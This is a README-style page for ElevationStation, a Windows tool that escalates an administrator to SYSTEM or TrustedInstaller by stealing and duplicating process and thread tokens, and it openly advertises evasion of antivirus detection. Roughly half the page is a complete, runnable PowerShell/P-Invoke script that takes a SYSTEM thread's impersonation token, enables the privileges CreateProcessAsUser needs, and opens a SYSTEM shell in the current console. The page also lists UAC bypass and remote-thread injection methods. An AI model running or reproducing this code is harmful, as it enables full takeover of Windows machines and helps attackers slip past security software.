Elevationstation – Elevate To SYSTEM Any Way We Can! Metasploit And PSEXEC Getsystem Alternative



Elevation Station

Stealing and Duplicating SYSTEM tokens for fun & profit! We duplicate things, make twin copies, and then ride away.

You have used Metasploit's getsystem and Sysinternals PsExec for getting SYSTEM privs, correct? Well, here's a similar standalone version of that…but without the AV detections…at least for now.

This tool also enables you to become TrustedInstaller, similar to what Process Hacker/System Informer can do. This functionality is very new and was added in the latest code and binary release as of 8/12/2023!

If you like this tool and would like to help support me in my efforts improving this solution and others like it, please feel free to hit me up on Patreon! https://patreon.com/G3tSyst3m


Quick rundown on commands

(The original README shows a screenshot for each command; only the method names are reproduced here.)

  • Bypass UAC and escalate from medium integrity to high (must be a member of the local Administrators group)
  • Become TrustedInstaller!
  • Duplicate Process Escalation Method
  • Duplicate Thread Escalation Method
  • Named Pipes Escalation Method
  • CreateRemoteThread Injection Method


What it does

ElevationStation is a privilege escalation tool. It borrows from commonly used escalation techniques that manipulate and duplicate process and thread tokens.

Why reinvent the wheel with yet another privilege escalation utility?

This grew out of two things: avoiding the AV alerts that Metasploit's getsystem triggers, and furthering my research into token-based privilege escalation. In brief: my main goal was to learn about token management and manipulation, and to effectively bypass AV. I knew there were other tools out there that achieve privilege escalation through token manipulation, but I wanted to learn for myself how it all works.

So…How does it work?

Looking through the terribly organized code, you'll see I have used two primary methods to get SYSTEM so far: stealing a primary token from a SYSTEM-level process, and stealing an impersonation token from a thread of another SYSTEM-level process and converting it to a primary token. That's the general approach at least.

CreateProcessAsUser versus CreateProcessWithToken

This was another driving force behind furthering my research. Unless one resorts to named-pipe impersonation for escalation, or to injecting a DLL into a SYSTEM-level process, I couldn't see an easy way to spawn a SYSTEM shell within the same console AND meet the token privilege requirements.

Let me explain…

When using CreateProcessWithToken, the new shell ALWAYS lands in a separate cmd window. As best I can tell this is unavoidable, and it isn't really a bug: CreateProcessWithTokenW hands the request to the Secondary Logon service (seclogon), which creates the process on our behalf, so the new process does not inherit our console. It is unfortunate, because CreateProcessWithToken doesn't demand much as far as token privileges are concerned (just SeImpersonatePrivilege, which a high-integrity admin already holds). Yet, if you want a shell from this Windows API, you're going to have to live with a new SYSTEM shell in a separate window.

That leads us to CreateProcessAsUser. I knew this would spawn a shell within the current console, but I needed a way to achieve it without having to run as a Windows service in order to meet the token privilege requirements, namely:

  • SE_ASSIGNPRIMARYTOKEN_NAME TEXT(“SeAssignPrimaryTokenPrivilege”)
  • SE_INCREASE_QUOTA_NAME TEXT(“SeIncreaseQuotaPrivilege”)

I found a way around that…stealing tokens from the threads of SYSTEM processes 🙂 We duplicate a thread's IMPERSONATION token, set it on our own thread, duplicate it again as a primary token, and then re-run our enable-privileges function. This time enabling the two privileges above succeeds, because the access check now runs against the SYSTEM token our thread is impersonating, and CreateProcessAsUser presents us with a shell inside the same console. No DLL injection, no named-pipe impersonation, just token manipulation/duplication. Two caveats: you need to be able to open threads inside SYSTEM processes (in practice an elevated admin context with SeDebugPrivilege), and the stolen token must be at SecurityImpersonation level or higher; an identification-level token can be inspected but not impersonated, and it cannot be duplicated into a primary token.
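The full sequence described above (open a SYSTEM thread, duplicate its impersonation token, impersonate it, convert it to a primary token, enable the two privileges, CreateProcessAsUser in the current console), written out as an added example. This is PowerShell with P/Invoke, not ElevationStation's own C++ code. Assumptions: it runs from an elevated (high-integrity) PowerShell as a local admin; the candidate process list (svchost, spoolsv, winlogon) is a guess at SYSTEM services whose threads are often impersonating; the `Tok` class and the `Enable-Privilege` / `Find-SystemThreadToken` function names are mine.

```powershell
# Added example, not ElevationStation's code: steal a SYSTEM thread's impersonation token,
# convert it to a primary token, enable what CreateProcessAsUser needs, and spawn cmd.exe in THIS console.
# Assumes an elevated (high-integrity) PowerShell run by a local admin.
Add-Type -TypeDefinition @"
using System; using System.Runtime.InteropServices;
public static class Tok {
  public const uint TOKEN_QUERY=0x8, TOKEN_DUPLICATE=0x2, TOKEN_IMPERSONATE=0x4, TOKEN_ADJUST_PRIVILEGES=0x20,
    TOKEN_ALL_ACCESS=0xF01FF, THREAD_QUERY_INFORMATION=0x40, SE_PRIVILEGE_ENABLED=0x2;
  public const int SecurityImpersonation=2, TokenPrimary=1, TokenImpersonation=2;
  [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
  [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { public LUID Luid; public uint Attributes; }
  [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID_AND_ATTRIBUTES Privileges; }
  [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] public struct STARTUPINFO {
    public int cb; public string lpReserved, lpDesktop, lpTitle; public int dwX, dwY, dwXSize, dwYSize, dwXCountChars,
    dwYCountChars, dwFillAttribute, dwFlags; public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError; }
  [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
  [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
  [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenThread(uint access, bool inherit, uint tid);
  [DllImport("kernel32.dll", SetLastError=true)] public static extern bool CloseHandle(IntPtr h);
  [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr tok);
  [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenThreadToken(IntPtr thread, uint access, bool openAsSelf, out IntPtr tok);
  [DllImport("advapi32.dll", SetLastError=true)] public static extern bool DuplicateTokenEx(IntPtr tok, uint access, IntPtr attrs, int impLevel, int type, out IntPtr newTok);
  [DllImport("advapi32.dll", SetLastError=true)] public static extern bool SetThreadToken(IntPtr thread, IntPtr tok);
  [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
  [DllImport("advapi32.dll", SetLastError=true)] public static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
  [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] public static extern bool CreateProcessAsUser(IntPtr tok, string app, string cmd,
    IntPtr pa, IntPtr ta, bool inherit, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
"@
$Marshal = [Runtime.InteropServices.Marshal]

function Enable-Privilege([IntPtr]$Token, [string]$Name) {
  $luid = New-Object 'Tok+LUID'
  if (-not [Tok]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { return $false }
  $la = New-Object 'Tok+LUID_AND_ATTRIBUTES'; $la.Luid = $luid; $la.Attributes = [Tok]::SE_PRIVILEGE_ENABLED
  $tp = New-Object 'Tok+TOKEN_PRIVILEGES'; $tp.PrivilegeCount = 1; $tp.Privileges = $la
  $ok = [Tok]::AdjustTokenPrivileges($Token, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
  # AdjustTokenPrivileges returns TRUE even if the token lacks the privilege (ERROR_NOT_ALL_ASSIGNED), so check the last error too.
  return ($ok -and ($Marshal::GetLastWin32Error() -eq 0))
}

function Find-SystemThreadToken {
  # Process list is an assumption: SYSTEM services whose worker threads are often impersonating a SYSTEM caller.
  foreach ($p in Get-Process -Name svchost, spoolsv, winlogon -ErrorAction SilentlyContinue) {
    foreach ($t in $p.Threads) {
      $hThread = [Tok]::OpenThread([Tok]::THREAD_QUERY_INFORMATION, $false, [uint32]($t.Id))
      if ($hThread -eq [IntPtr]::Zero) { continue }
      $hTok = [IntPtr]::Zero
      # ERROR_NO_TOKEN (1008) here only means the thread is not impersonating anyone right now.
      $got = [Tok]::OpenThreadToken($hThread, [Tok]::TOKEN_QUERY -bor [Tok]::TOKEN_DUPLICATE -bor [Tok]::TOKEN_IMPERSONATE, $true, [ref]$hTok)
      [void][Tok]::CloseHandle($hThread)
      if (-not $got) { continue }
      $hImp = [IntPtr]::Zero
      # Duplicating at SecurityImpersonation fails (ERROR_BAD_IMPERSONATION_LEVEL) for identification-level tokens, which we could not impersonate anyway.
      $dup = [Tok]::DuplicateTokenEx($hTok, [Tok]::TOKEN_ALL_ACCESS, [IntPtr]::Zero, [Tok]::SecurityImpersonation, [Tok]::TokenImpersonation, [ref]$hImp)
      [void][Tok]::CloseHandle($hTok)
      if (-not $dup) { continue }
      $id = New-Object -TypeName Security.Principal.WindowsIdentity -ArgumentList $hImp
      $isSystem = $id.User.IsWellKnown([Security.Principal.WellKnownSidType]::LocalSystemSid)
      # A SYSTEM process may be impersonating an ordinary user; keep only LocalSystem tokens on which both required privileges enable.
      if ($isSystem -and (Enable-Privilege $hImp 'SeAssignPrimaryTokenPrivilege') -and (Enable-Privilege $hImp 'SeIncreaseQuotaPrivilege')) { return $hImp }
      [void][Tok]::CloseHandle($hImp)
    }
  }
  return [IntPtr]::Zero
}

# 1. SeDebugPrivilege on our own token so OpenThread can reach threads inside SYSTEM processes.
$hSelf = [IntPtr]::Zero
[void][Tok]::OpenProcessToken([Tok]::GetCurrentProcess(), [Tok]::TOKEN_ADJUST_PRIVILEGES -bor [Tok]::TOKEN_QUERY, [ref]$hSelf)
if (-not (Enable-Privilege $hSelf 'SeDebugPrivilege')) { throw 'SeDebugPrivilege unavailable: run this from an elevated admin shell' }

# 2. Steal a SYSTEM impersonation token and make the primary copy the new process will run under.
$hImp = Find-SystemThreadToken
if ($hImp -eq [IntPtr]::Zero) { throw 'No SYSTEM thread with a usable impersonation token found' }
$hPrimary = [IntPtr]::Zero
if (-not [Tok]::DuplicateTokenEx($hImp, [Tok]::TOKEN_ALL_ACCESS, [IntPtr]::Zero, [Tok]::SecurityImpersonation, [Tok]::TokenPrimary, [ref]$hPrimary)) {
  throw "DuplicateTokenEx(TokenPrimary) failed: $($Marshal::GetLastWin32Error())"
}

# 3. Impersonate SYSTEM on this thread. CreateProcessAsUser checks SeAssignPrimaryTokenPrivilege/SeIncreaseQuotaPrivilege against the
#    caller's *effective* token, which is now the stolen one with both privileges enabled, so no service account is needed.
if (-not [Tok]::SetThreadToken([IntPtr]::Zero, $hImp)) { throw "SetThreadToken failed: $($Marshal::GetLastWin32Error())" }
$si = New-Object 'Tok+STARTUPINFO'; $si.cb = $Marshal::SizeOf($si)
$procInfo = New-Object 'Tok+PROCESS_INFORMATION'
# No CREATE_NEW_CONSOLE and bInheritHandles=$true: we are the creating process (not the Secondary Logon service, as with
# CreateProcessWithTokenW), so the child inherits this console instead of opening a new window.
$ok = [Tok]::CreateProcessAsUser($hPrimary, "$env:SystemRoot\System32\cmd.exe", $null, [IntPtr]::Zero, [IntPtr]::Zero, $true, 0,
  [IntPtr]::Zero, "$env:SystemRoot\System32", [ref]$si, [ref]$procInfo)
$err = $Marshal::GetLastWin32Error()
[void][Tok]::SetThreadToken([IntPtr]::Zero, [IntPtr]::Zero)   # drop the impersonation; the child keeps its own primary token
if (-not $ok) { throw "CreateProcessAsUser failed: $err" }
Write-Host "SYSTEM cmd.exe (PID $($procInfo.dwProcessId)) is attached to this console; 'whoami' there should say nt authority\system."
Wait-Process -Id $procInfo.dwProcessId
[void][Tok]::CloseHandle($hPrimary); [void][Tok]::CloseHandle($hImp)
```

Two design points worth noticing. The privilege check is folded into the search: a thread token is only accepted if it is LocalSystem and both SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege can actually be enabled on it, so a restricted or non-SYSTEM impersonation token inside a SYSTEM process is skipped rather than failing later at CreateProcessAsUser. And the contrast with CreateProcessWithTokenW is visible in one line: because this process is the creator, leaving out CREATE_NEW_CONSOLE and passing bInheritHandles keeps the SYSTEM cmd.exe in the same window, which is exactly what the seclogon-mediated API cannot give you.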

Progress

This has come a long way so far…and I’ll keep adding to it and cleaning up the code as time permits me to do so. Thanks for all the support and testing!
